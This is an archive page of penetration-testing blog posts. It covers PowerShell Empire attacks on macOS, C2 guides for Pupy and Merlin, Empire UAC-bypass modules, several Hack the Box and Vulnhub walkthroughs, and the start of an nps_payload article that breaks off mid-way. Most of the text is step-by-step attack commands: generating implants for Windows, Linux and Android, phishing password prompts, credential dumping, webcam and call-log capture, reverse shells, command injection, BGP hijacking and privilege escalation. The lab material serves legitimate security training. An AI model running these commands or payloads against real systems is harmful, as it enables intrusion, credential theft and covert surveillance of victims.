Author Archives: Raj Chandel

OSX Exploitation with Powershell Empire

This article is another post in the empire series. In this article, we will learn OSX Penetration testing using empire.

Table of Content

Exploiting MAC

Post Exploitation

  • Phishing
  • Privilege Escalation
  • Sniffing

Exploiting MAC

Here I’m considering you know PowerShell Empire’s basics, therefore, we will create the listener first using the following commands:

uselistener http
set Host http://192.168.1.26
execute

Executing the above commands will start up the listener as shown in the image above. Now the next step is to create a stager for OS X. And for that, type :

usestager osx/launcher
execute

As you can see in the image above, the above stager will generate a code. Execute this code in the target system i.e. OS X and after the execution, you will have your session as shown in the image below :

Post Exploitation

Phishing

As we have the session of our mac, there are few post exploits that can use to our advantage. The first post exploitation module we will use is a collection/osx/prompt. Using this module will ask the user to enter their password to their Apple ID, which means this module does not work in stealth mode. To use this module type :

usemodule collection/osx/prompt
execute

Executing the above module will open a prompt in the target machine as shown in the image below and when entered password you have it in clear text as shown in the image above.

Privilege Escalation

For the privilege escalation of OS X, we have used the module privesc/multi/sudo_spawn. To sue this module type :

usemodule privesc/multi/sudo_spawn
set Listener http
set Password toor
execute

Executing this module will give you admin rights with a new session, as you can see in the image below :

Sniffing

The module we will use is collection/osx/sniffer. This will sniff around all the traffic in the coming to and going from our target system and give us all the necessary details by creating a pcap file.  To use module type :

usemodule collection/osx/sniffer
execute

As you can see that you will even find the password in clear text in the pcap file as shown in the image below :

Next post module is of taking a screenshot of the target system and to use the said module type :

usemodule collection/osx/screenshot
execute

The above module will take a screenshot as shown in the image below :

There is a further number of post modules which you can use and experiment with as shown in the image below :

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post OSX Exploitation with Powershell Empire appeared first on Hacking Articles.

Hack the Box Carrier: Walkthrough

Today we are going to solve another CTF challenge “Carrier”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Carrier is 10.10.10.105

Penetrating Methodology

  • Network scanning (Nmap)
  • Enumerating SNMP service port (161)
  • Surfing HTTPS service port (80)
  • Logging in through the Web portal
  • Finding command injection in web application
  • Getting reverse shell
  • Finding the first flag.
  • Finding Border Gateway Protocol
  • Border Gateway Protocol (BGP) Hijacking
  • Capturing FTP credentials
  • Logging in through SSH
  • Finding final flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sC -sV -p-  -T4 10.10.10.105
nmap -sU --min-rate=5000 -T4 10.10.10.105

The Nmap scan shows us that there are 3 TCP ports are open: 21(FTP), 22(SSH), 80(HTTP) and 1 UDP port is open: 161(SNMP)

As port 161 is open we use snmpwalk to enumerate SNMP port and find a string called “SN#NET_45JDX23”.

snmpwalk -c public -v 1 10.10.10.105

As port 80 is open, we open the web services in the browser and we find a login page.

We try username “admin” and the string we find earlier as the password. But were unable to login but by using the password “NET_45JDX23”, we were able to login.

By checking the different options in the web application, in the diagnostic tab, we find something interesting. When we click on the “Verify status” button, we find that the server might be running “ps” command.

So further enumerate the web application, we use BurpSuite to capture the request and find inside the “check” parameter a base64 encoded string. When we decode the base64 encoded string we find the string to be called “quagga”. Now if check the web application, it is showing all the process that contains the string “quagga”. So that means the web application is running “ps” with “grep quagga” command.

Now to verify our theory, we change the check parameter to “root” and then encode it to base64 and then encode it to URL encode.

When we send the new request we find that the web application is displaying all the process that contains the string “root”.

Now we check if the web application is vulnerable to command injection or not. We try to run id command on the server.

By changing the parameter to “hack;id” and then encoding it with base64 encode and URL encode we forward the request to the server.

When we check the web application, we find that we are successfully able to run the “id” command that means the web application is vulnerable to command injection.

Now we replace the id command with nc reverse shell one-liner.

We encode the string with base64 encode and URL encode. We setup our listener and then forward the request.

As soon as we forward the request we get a reverse shell, we spawn a TTY shell and check for files in the current directory. Inside we find a file called “user.txt”, we open the file and find the first flag.

python -c "import pty; pty.spawn('/bin/bash')"

After getting a root shell we enumerated the machine, we do not find anything interesting. Going back to the tickets section on the web page, we find a hint that we need to check another subnet.

We use the ping command to find all the available machines on the subnet “10.120.15.0/24”.

for i in {1..255}; do ping -c 1 10.120.15.$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done

Now we according to the ticket we know there is ftp server running on subnet “10.120.15.0/24”. So we scan both the IP addresses and find port 21 is open on 10.120.15.10. Further enumerating the system in cronjob we find that there is a bash script inside /opt/ directory called “restore.sh”. We take a look at the content of the file and find that the machine is working with Border Gateway Protocol (BGP) with Quagga. Now we can use a technique called BGP hijacking to take over the IP address. The bash script restores the BGP configuration every 10 minutes, so we remove executable permissions from the script so that we can make changes to the configuration of BGP

crontab -l
chmod -x /opt/restore.sh

Now we connect to the vty shell and check the current configuration.

vtysh
show running-config

Now switch to configure mode, and to intercept the traffic we want 10.120.15.0/25 to use our machine as the gateway.

configure terminal
ip prefix-list 0xdf permit 10.120.15.0/25
route-map to-as200 permit 10
match ip address prefix-list 0xdf
set community no-export
route-map to-as200 permit 20
route-map to-as300 deny 10
match ip address prefix-list 0xdf
route-map to-as300 permit 20
router bgp 100
network 10.120.15.0 mask 255.255.255.128
end
clear ip bgp *

If we check our BGP routes we find that our machines will be used as a gateway.

show ip bgp neighbors 10.78.10.2 advertised-routes

Now we will start collecting packets on port 21 using tcpdump, we will be using the interface eth2.

tcpdump -i eth2 -nnXSs 0 'port 21' -w hack.pcap

We wait for some time then interrupt the capture and check if the pcap file has been created. Now we transfer the file to our system and analyze it with Wireshark and find the password for FTP.

Password: BGPtelc0routing

We use this password to login through SSH on the target system and are successfully able to login. After logging in, we find a file called root.txt, we take a look at the content of the file and find the final flag.

ssh root@10.10.10.105

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiastContact Here

The post Hack the Box Carrier: Walkthrough appeared first on Hacking Articles.

Command & Control Tool: Pupy

In this article, we will learn to exploit Windows, Linux and Android with pupy command and control tool.

Table of Content :

  • Introduction
  • Installation
  • Windows Exploitation
  • Windows Post Exploitation
  • Linux Exploitation
  • Linux Post Exploitation
  • Android Exploitation
  • Android Post Exploitation

Introduction

Pupy is a cross-platform, post exploitation tool as well as a multi-function RAT. It’s written in python which makes it very convenient. It also has low detectability that’s why it’s a great tool for the red team.  Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

It uses a reflected DLL to load python interpreter from memory which is great as nothing will be shown in the disk. It doesn’t have any special dependencies. It can also migrate into other processes. The communication protocols of pupy are modular and stackable. It can execute non-interactive commands on multiple hosts at once. All the interactive shells can be accessed remotely.

Installation

To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy
ls
./install.sh

Now download all the requirements using pip like the following command :

cd pupy
pip install -r requirements.txt

Now run pupy using the following command :

./pupysh.py

This command will open the prompt where you will get your session.

Now, to create our payload we will use the pupygen. Use the following help command to see all the attributes which we can use :

./pupygen.py -h

Windows Exploitation

Now we will create a windows payload in order to exploit windows with the following command :

./pupygen.py -O windows -A x86 -o /root/Desktop/shell.exe

Here,

-O : refers to the operating system

-A : refers to the architecture

-o : refers to the output file path

When you are successful in executing the shell.exe in the victims’ PC, you will have your session as shown in the image :

Windows Post Exploitation

Further, there are number of post-exploits you can use, they are pretty simple to use. Some of them we have shown in our article. For message dialogue box to pop up on the target machine you can use the following command :

msgbox –-title hack "you have been hacked"

As per the command, following dialogue box will open on the target machine :

You can also access the desktop using the remote desktop module with the following command :

rdesktop -r 0

After executing the above command you can remotely access the desktop just as shown in the image below :

For bypass UAC, we have the simplest command in pupy i.e. the following :

bypassuac -r

The above command will recreate a session with admin privileges as shown in the image below :

Then for getting the system’s credentials, you can use the following command :

creddump

And as you can see in the image below, you get the information about all the credentials :

Using pupy, we can also migrate our session to a particular process. With migrate command, the attributes of the command are shown in the image below :

With ps command, you can find out the process ID number of all the processes running on the target PC, along with letting you know which process is running. Knowing the process ID is important as it will be required in the migrate command and will help us to migrate our session as we desire.

Now, as we know the processes that are running, we can use it to migrate our session. For this, type the following command :

migrate -p explorer.exe -k

And then a new session will be created as desired.

Linux Exploitation

To exploit Linux, we will have to generate Linux payload with the following command :

./pupygen.py -O linux -A x64 -o /root/Desktop.shell

Once you execute the malicious file in the target system, you will have your session as shown in the image below :

As you have a session now, you can check if the target machine is running on a VM or is it a host machine with the following command :

check_vm

And as you can see in the image below that the target machine is, in fact, running on VM

Linux Post Exploitation

In post-exploitation, you can have detailed information about the target system with the following command :

privesc_checker --linenum

With pupy, you can also find out all the exploits that are working on the target system with the help of the following command :

exploit_suggester –shell /bin/bash

As you can see that in the image below, it has given us the list of all the exploits to which the target system is vulnerable.

To get the basic information about the target system such as IP address, MAC address, etc. you can use the following command :

get_info

Android Exploitation

Now we will create an android payload in order to exploit windows with the following command :

./pupygen.py -O android -o /root/shell.apk

When you are successful in installing the shell.apk in the victims’ Android Phone, you will have your session as shown in the image :

Android Post Exploitation

In post-exploitation, you can grab the call logs stored on the target device with the following command :

call -a -output-folder /root/call

Here,

-a : refers to getting all the call details

-output-folder : refers to the path of the output file containing the call logs

We will use the cat command on callDetails.txt to read the call logs.

To get the camera snap from the primary camera on the target device, you can use the following command :

webcamsnap -v

Here,

-v : refers to view the image directly

As we can see in the given image that we have the snap captured and stored at the given location.

To get the information about the installed packages or apps on the target device, you can use the following command :

apps -a -d

Here,

-a : refers to getting all the installed packages details

-d : refers to view detailed information

As we can see in the given image that we have detailed information about the packages or apps installed on the target machine.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiastContact Here

The post Command & Control Tool: Pupy appeared first on Hacking Articles.

Multiple Ways to Exploiting OSX using PowerShell Empire

In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.

Table of Content :

  • osx/macho
  • osx/applescript
  • osx/launcher
  • osx/jar
  • osx/safari_launcher

osx/macho

The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.

The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :

osx/applescript

The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :

usestager osx/applescript
set Listener http
execute

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :

osx/launcher

The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :

usestager osx/launcher
execute

copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :

osx/jar

The nest stager which we will use is osx/jar. This stager creates a jar file which is a Java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :

usestager osx/jar
set Listener http
set OutFile out.jar
execute

The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :

osx/safari_launcher

The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Multiple Ways to Exploiting OSX using PowerShell Empire appeared first on Hacking Articles.

Web Developer: 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “Web Developer: 1”. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Enumerating directories using Dirb
  • Finding “cap” file
  • Analyzing the “cap” file and finding WordPress password
  • Installing the vulnerable plugin in WordPress
  • Exploiting the vulnerable to get a reverse shell
  • Finding SSH login and password
  • Finding application is a sudoers list
  • Getting flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.19.131

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.19.131

From the NMAP Version Scan we enumerated the following details:

22 Port having the SSH service and 80 Port having HTTP service.

As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.

As we couldn’t find any links on this page. So, we will do a directory bruteforcing using dirb scan. From the scanning result, we choose the highlighted directory for further enumeration.

So, we opened this directory in the browser and found a cap file.

We will open cap file in Wireshark, and you can see that we found the username and password through it.

And using the above username and password, you can directly log on to the website. As you can see that the website is in WordPress. And I remember that there is a plug-in of WordPress that is vulnerable. So, in the plugin I added a new plugin i.e. ReFlex Gallery as you can in the image below:

Now, we will use the in-build exploit from Metasploit to exploit this plugin and get a session. And for this, we use the following set of commands:

use exploit/unix/wepapp/wp_reflexgallery_file_upload
set rhosts 192.168.19.131
exploit

Once we got the session, I navigated through it a lot and found the wp-config.php, now, when reading the config file, we find username and password.

Now we find credentials inside the file, we use this credential to log in through SSH. After logging in we check the sudoers list and find we can run “tcpdump” as the root user.

ssh webdeveloper@192.168.19.131
sudo -l

So, we can execute a file using tcpdump, so we use the following command to execute “ls -al /root” command. Now the command will be executed only when tcpdump captures a packet.

COMMAND='ls -al /root'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

After starting tcpdump, in a new terminal, we connect to the target machine through SSH. Now we send a TCP packet to the 127.0.0.1 using netcat. We had to use this locally as we started tcpdump on the loopback interface.

nc -v -z -n -w 1 127.0.0.1 1

As soon as we send the packet, our command is executed and we can see all the files inside “/root” directory. Inside “/root” directory, we find a file called “flag.txt”. We are again going to use tcpdump command to open “flag.txt” and are able to get the final flag.

COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post Web Developer: 1: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

HackInOS:1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “HackInOS: 1”. The credit for making this VM machine goes to “Fatih Çelik” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Finding upload directory
  • Finding source code for a web application
  • Getting reverse shell
  • Pivoting using Metasploit
  • Logging in through MySQL and find an SSH credentials
  • Logging in through SSH
  • Getting the root shell and finding the flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.101

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.1.101

The NMAP output shows us that there are 2 ports open: 22(SSH), 8000(HTTP)

We find that port 8000 is running HTTP, so we open the IP in our browser and find there is WordPress CMS running on the web server.

We don’t find any vulnerable plugin or theme on the CMS, so we run a dirb scan to enumerate the directories on the target machine.

dirb http://192.168.1.101:8000/

Dirb scan gave us “robots.txt”, we open it and find a link to “upload.php” and “/uploads”.

We open upload.php and find a page where we can upload images. Here we try to upload an image and get a smiling face, it looks like it means there is an error uploading the file.

We open the source code of the web page and inside a comment we find a GitHub link.

We open the GitHub link and find there is a source code for the upload.php file.

Now to upload the image we just need to add “GIF98” to the start of the php reverse shellcode we want to upload.

Now when we upload our php reverse shell, we are successfully able to upload the shell. But we do not know the filename after it is uploaded on the server.

Taking a look at the source code of “upload.php” we find that after the shell is uploaded the file gets renamed to “md5(<filename><random number )between 1 – 100>.<file extension>”. So, we create a python script that creates a text file filled with all the 100 md5 filename.  You can download the script from here.

Now we run the python script and use dirb to bruteforce the new file name.

dirb http://192.168.1.101:8000/uploads/ dict.txt

We set up the listener, and again run the dirb command again and get a reverse shell.

nc -lvp 1234
dirb http://192.168.1.101:8000/uploads/ dict.txt

After getting a reverse shell, we spawn a TTY shell and we find that we are inside a Docker container. We find all files with SUID bit set and find that “tail” command has SUID bit set. So, we use the “tail” command to open “/etc/shadow”.

python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 2>/dev/null
tail -c1G /etc/shadow

We get the password for “root” user from /etc/shadow file and we copy and save it in our system. We crack the hash using john the ripper and find the password to be “john”.

john hash

After finding the password, we switch to the root user. After becoming a root user, we switch to “/root” directory and find a file called “flag”. We open the “flag” file and find nothing useful.

Further enumerating the system, inside /var/www/html/wp-config.php. We open the username and password for database login. There is no MySQL service running on the machine and we are also not able to login through SSH using these credentials.

Getting back inside /root directory, we find a file called “.port”. We open the file and find a hint to look for other containers.

To further interact with the shell, we get a meterpreter reverse shell. We use the web_delivery module in Metasploit-framework to get a reverse shell.

msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > setg lhost eth0
msf5 exploit(multi/script/web_delivery) > setg lport 8888
msf5 exploit(multi/script/web_delivery) > run

We copy the command provided by web_delivery module and run it on the target machine.

As soon as we run the command on the target machine, we get a reverse shell. After getting a reverse shell, we use autoroute module in Metasploit-framework for pivoting.

msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit

Then we use the ping_sweep module to find all the machines on the new network.

msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit

Then we run a portscan module to find all the ports on all the machines.

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit

We find the following ports open on the following machines:

172.18.0.1 22,8000
172.18.0.2 80
172.18.0.3 3306
172.18.0.4 2021

As we know port 3306 is for MySQL service and we also have username and password for WordPress database. So, we can login through MySQL on target “172.18.0.3” and use credentials “wordpress:wordpress”.

meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
mysql -u wordpress -p wordpress -h 172.18.0.3

After logging in we check all the databases on the MySQL server.

show databases;

We now check all the tables available on the database and find a table called “host_ssh_cred”. We check the columns inside the table and find the username and hash of a password.

show tables;
select * from host_ssh_cred;

We save the hash in our system and use john the ripper to crack the hash

john --format=RAW-md5 sshpass

Now we have the credentials for SSH; hummingbird:123456. We login through SSH and now when we run the id command, we find that we are a member of the docker group. Some containers have a dedicated group to allow unprivileged users to manage their containers without having to escalate their privileges. To exploit this vulnerability, we first need to check the docker images that are available.

ssh hummingbirdscyber@192.168.1.101
id
docker images

We find that the Ubuntu image is available to us, so we use this to create a new docker container and mount the / directory of the host inside a folder called /root. After we run the docker image we go to /root/root and find a file called “flag”. When we open the file, we find our congratulatory flag.

docker run -v /:/root -i -t ubuntu /bin/bash
cd /root
cd root
cat flag

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post HackInOS:1: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

Command and Control Guide to Merlin

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.

Table of content:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Linux exploitation
  • Linux post exploitation

Introduction

Merlin is a great cross-platform Command and control tool written in the Go language. It’s made of two elements i.e. the server and agent. It works on the HTTP/2 protocol. The best things about Merlin are that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us put agents on any platform/machine we come across and we can listen to it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.

The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using the Merlin server. Any binary file is executed with the target’s path variable.

Installation

Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for Merlin to work. So, to install the Go language type:

apt install golang

And then to install merlin the following commands:

mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Once the above commands are executed successfully, use the following command to unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z

Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:

./merlinServer-Linux-x64

In “README.MD”, we find the instructions for installing “Merlin” in our system.

Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:

echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin

Once the directory is downloaded, let’s check its contents using cd and ls commands.

There was a cmd directory, and in it, there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :

go run main.go

As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:

Now if you run merlin using the command: go run main.go, merlin server will run successfully.

Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:

go run main.go -h

Windows exploitation

Now, to make Merlin agent for windows type the following command:

GOOS=windows GOARCH=amd64 go build -ldlags "-X main.url=https://192.168.0.11:443" -o shell.exe main.go

Now, share the shell with the target using the python server:

python -m SimpleHTTPServer 80

In order to create a listener for the shell to revert, use the following command:

go run main.go -i 192.168.0.11

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:

Type sessions to see the list of the sessions you acquire as shown in the image below:

To access than an available session uses the following command:

interact <session name>

As you have accessed the session, here you can use windows commands such as:

shell ipconfig

Then further you can use various post exploitation modules, list of which are shown in the image below:

Windows post exploitation

We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:

use module windows/x64/powershell/credentials/dumpCredStore

As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So, therefore, let’s set the options:

set agent <agent name>
run

Linux exploitation

Now, we will make a merlin agent for Linux machine. For this, simply type the following command:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags "-s -w -X main.url=https://192.168.0.11:443" -o shell.elf main.go

Once the command is executed, your malware will be created. Use the python to share the file with the victim as shown in the image below or however see it fit. For starting python HTTP server:

python -m SimpleHTTPServer 80

Setup the listener and wait for the file to get executed.

go run main.go -I 192.168.0.11

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.

Then to access the session use the following command:

interact <session name>

Then further you can use any Linux command such as:

shell ls

Linux post exploitation

Even in Linux, you can further use a number of post-exploitation modules. The one we will be using in this article is privesc/LinEnum:

use module linux/x64/bash/priesc/LinEnum

Through info command, we know that we have to give a session in order to run this module. So, type:

set agent <session name>
run

And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how convenient it is crossed-platformed.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post Command and Control Guide to Merlin appeared first on Hacking Articles.

unknowndevice64: 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “unknowndevice64: 1”. The credit for making this VM machine goes to “Ajay Verma” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Finding image File
  • Extracting the hidden file from the image
  • Logging in through SSH
  • Escaping restricted shell
  • Finding binary in sudoers list
  • Getting the root shell and finding the flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.1.104

The NMAP output shows us that there are 2 ports open: 1337(SSH), 31337(HTTP)

We find that port 31337 is running HTTP, so we open the IP in our browser. Here we find a string “h1dd3n” that might be a hint or a password for something.

We take a look at the source code of the web page and inside a comment, we find a string called “key_is_h1dd3n.jpg”.

We open the image in our browser and download it in our system.

After downloading the image, we use steghide to extract any hidden file from the image. When we try to extract files using steghide, it prompts for a password. We use the password “h1dd3n” we found earlier on the webpage and were successfully able to extract a text file. We take a look at the content of the text file and find a brain fuck encoded string.

steghide extract -sf key_is_h1dd3n.jpg

We decode the brainfuck encoded string using this site and find a username and password.

Username: ud64
Password: 1M!#64@ud

As port 1337 is running SSH, we use the credentials we found above to log in. After logging in through SSH we find that we have a restricted shell, and PATH and SHELL environment variable are read-only.

ssh ud64@192.168.1.104 -p 1337

After pressing the “tab” button twice, we find the commands we can run using the restricted shell. Among that command, we find that we can use the Vi editor. We use Vi editor to escape the restricted shell.

:!/bin/bash

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly. Now we check sudoers list and find we can run “/usr/bin/sysud64” as root without a password.

export PATH=/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL
sudo -l

On checking the help for “sysud64”, we find that it is actually executing strace.

sudo sysud64 -h | less

As we can run sysud64 as root and sysud64 are actually running the strace command. We can spawn a shell as root user using “sysud64”. After spawning a shell as the root user, we switch to the root directory and

sudo sysud64 -o /dev/null /bin/sh

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post unknowndevice64: 1: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

Bypass User Access Control using Empire

This is the fifth article in our empire series, for the basic guide to empire click here. In this article, we will learn to bypass administrator privileges using various bypassuac post-exploitation methods.

Table of content :

  • Introduction
  • Bypassuac_env
  • Bypassuac_eventvwr
  • Bypassuac_fodhelper
  • Bypassuac_wscript
  • Bypassuac

Introduction

UAC stands for User Account Control, which means which user has how many rights to make changes in the system. The rights are given too a user depends on the integrity levels; which are :

  • High : Administrator rights
  • Medium : Standard user rights
  • Low : Extremely restricted

UAC works by adjusting the permission level of our user account, and on the bases of this permission, it decides whether to run a program or not. When changes are made to this permission level, it notifies us but these modules help us to bypass UAC. When we try and gain the highest integrity that is indicated by the number 1.

Bypassuac_env

 Let’s start with the first exploit i.e. bypassuac_env. Now, as you can see in the image, we already have an empire session with the integrity of 0, which means we do not have admin right. So type the following set of commands to get administrator privileges :

usemodule privsec/bypassuac_env 
set Listener http 
execute

Executing the above module will give you a new session. Upon accessing the said session you can see the integrity has to change to 1, which means no we have administrator rights, just as shown in the image below :

bypassuac_eventvwr

Now, let’s try another exploit which is privsec/bypassuac_eventvwr. The function of this module is the same as before i.e. to get administrator rights so we can attack more effectively.  This module makes changes in the registry key and inserts a custom command which is then executed when windows event viewer is launched. This custom command will turn the UAC flag off. And, as you can see, we have the session with the integrity of 0 which indicates we have no admin rights yet. So, run the following commands :

usemodule privsec/bypassuac_eventvwr 
set Listener http 
execute

As you can see, we have a new session with the integrity of 1 which confirms that we now have admin rights.

Bypassuac_fodhelper

The next module we will use for the same purpose is privesc/bypassuac_fodhelper. This module will gain administrator rights by hijacking a special key in the registry and inserting custom command that will get invoked when windows fodhelper.exe application will be executed. It covers its tracks by getting rid of the key after the payload is invoked. Now, just like before use the following set of commands :

usemodule privesc/bypassuac_fodhelper 
set Listener http execute

Once the module is executed, you will have the session with the integrity of 1, hence we are successful in attaining the admin rights.

bypassuac_wscript

Next the bypassuac module we will use is privesc/bypassuac_wscript. When using wscript for UAC bypass, there is no need for you to send a dll to the target. As wscrpit.exe does not has embedded manifestation, it’s easy to abuse it. And similarly, to have administrator privileges use the following commands :

usemodule privesc/bypassuac_wscript 
set Listener http 
execute

As you can see in the image, the new session that we have gained is with admin rights.

bypassuac

The last module we will use for the same purpose is privesc/bypassuac, this is a trivial process. To execute the following commands :

usemodule privesc/bypassuac 
set Listener http 
execute

As you can see in the image above, the new session gained has the integrity of 1 hence the administrator rights are gained.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass User Access Control using Empire appeared first on Hacking Articles.

nps_payload: An Application Whitelisting Bypass Tool

In this article, we will create payloads using a tool named nps_payload and get meterpreter sessions using those payloads. This tool is written by Larry Spohn and Ben Mauch. Find this tool on GitHub.

Attacker: Kali Linux

Target: Windows 10

Table of Content:

  • Downloading and Installing
  • Getting session using MSBuild
  • Getting session using MSBuild HTA

Downloading and Installing

First, we will get the tool in our attacker machine. It is Kali Linux in our case. The tool is available at GitHub. We will use the git clone command to download it on our machine.

git clone https://github.com/trustedsec/nps_payload.git

Now we will traverse inside the folder that was downloaded using the git clone, we can check that if we have successfully downloaded the file using ls command. After that use cd to get inside the nps_payload folder. There are some requirements that are required for the nps_payload to run. Those are mentioned inside in the requirements text file. Now we can either install each of those requirements individually but that would be time taking. We will use the pip install command and then mention the requirements file. It will automatically pick the requirements from the file and install it.

pip install -r requirements.txt

Getting session using MSBuild

Now that we have successfully downloaded the tool and installed the requirements now it’s time to launch the tool and create some payloads and get some sessions. To launch the tool, we can either use command

python nps_payload.py

or we could just

./nps_payload.py

After launching the tool, we are given options to choose the technique we need to use. Is it going to be a default msbuild payload or the one in the HTA format? We are going to use both but first, we will choose the default msbuild payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

